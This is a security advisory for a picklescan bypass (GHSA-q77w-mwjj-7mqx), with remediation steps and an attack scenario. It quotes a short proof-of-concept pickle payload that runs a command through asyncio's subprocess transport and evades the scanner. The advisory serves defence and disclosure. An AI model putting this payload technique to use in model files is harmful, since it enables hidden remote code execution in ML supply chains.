GHSA-q77w-mwjj-7mqx: picklescan: scanner bypass enables model RCE

GHSA-q77w-mwjj-7mqx MEDIUM
Published August 26, 2025
CISO Take

picklescan, widely used to vet PyTorch and ML model files before loading, fails to flag malicious payloads that abuse Python's built-in asyncio subprocess transport. Any team using picklescan < 0.0.30 as a security gate for model loading has a false safety net — update immediately to 0.0.30. Audit any models loaded from untrusted sources while the vulnerable version was in use; treat them as potentially compromised.

Risk Assessment

High risk in ML pipeline contexts despite the medium CVSS label. The PoC is trivial and public, the attack bypasses the one tool most organizations use specifically to catch this class of threat, and ML teams routinely load third-party models without additional sandboxing. Any pipeline that downloads models from Hugging Face, S3, or other external registries and relies on picklescan for validation is exposed. The false-positive-free pass from the scanner dramatically increases likelihood of successful exploitation.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.30 0.0.30
402 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. PATCH

    Update picklescan to >= 0.0.30 immediately — this is the only direct fix.

  2. AUDIT

    Review model loading history while vulnerable version was in use; flag any models loaded from public or untrusted sources.

  3. FORMAT MIGRATION

    Migrate model storage to SafeTensors format where possible — SafeTensors is architecture-safe and immune to pickle-based RCE.

  4. SANDBOX

    Run model loading in isolated environments (containers, VMs) with no network access and minimal filesystem permissions regardless of scanner results.

  5. DETECT

    Alert on subprocess execution or unexpected network connections during model loading events.

  6. DEFENSE-IN-DEPTH: Never rely on a single scanner as the sole gate; combine picklescan with static analysis, hash verification, and provenance checks.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
A.6.2.6 - AI system supply chain security
NIST AI RMF
MS-2.5 - Risks from third-party AI components are regularly reviewed
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-q77w-mwjj-7mqx?

picklescan, widely used to vet PyTorch and ML model files before loading, fails to flag malicious payloads that abuse Python's built-in asyncio subprocess transport. Any team using picklescan < 0.0.30 as a security gate for model loading has a false safety net — update immediately to 0.0.30. Audit any models loaded from untrusted sources while the vulnerable version was in use; treat them as potentially compromised.

Is GHSA-q77w-mwjj-7mqx actively exploited?

No confirmed active exploitation of GHSA-q77w-mwjj-7mqx has been reported, but organizations should still patch proactively.

How to fix GHSA-q77w-mwjj-7mqx?

1. PATCH: Update picklescan to >= 0.0.30 immediately — this is the only direct fix. 2. AUDIT: Review model loading history while vulnerable version was in use; flag any models loaded from public or untrusted sources. 3. FORMAT MIGRATION: Migrate model storage to SafeTensors format where possible — SafeTensors is architecture-safe and immune to pickle-based RCE. 4. SANDBOX: Run model loading in isolated environments (containers, VMs) with no network access and minimal filesystem permissions regardless of scanner results. 5. DETECT: Alert on subprocess execution or unexpected network connections during model loading events. 6. DEFENSE-IN-DEPTH: Never rely on a single scanner as the sole gate; combine picklescan with static analysis, hash verification, and provenance checks.

What systems are affected by GHSA-q77w-mwjj-7mqx?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps model registries, CI/CD for ML, data science notebooks.

What is the CVSS score for GHSA-q77w-mwjj-7mqx?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using asyncio.unix_events._UnixSubprocessTransport._start function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to asyncio.unix_events._UnixSubprocessTransport._start function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from asyncio.unix_events import _UnixSubprocessTransport from types import SimpleNamespace class EvilAsyncioUnixSubprocessTransportStart: def __reduce__(self): fake_self = SimpleNamespace( _loop=None, _protocol=None, _proc=None ) args = "whoami" return _UnixSubprocessTransport._start, ( fake_self, args, True, None, None, None, 0 ) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

An attacker publishes a weaponized PyTorch model to Hugging Face or an S3 bucket accessible to the target organization. The model file contains a crafted __reduce__ method that calls asyncio.unix_events._UnixSubprocessTransport._start with a command payload (e.g., reverse shell or credential harvester). The victim's automated ML pipeline downloads the model, runs picklescan for validation — which returns clean — then calls torch.load(), triggering the payload with the privileges of the ML service account. In a CI/CD context this grants full pipeline access; in a model serving context it may expose inference infrastructure, training data, and API keys stored in the environment.

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities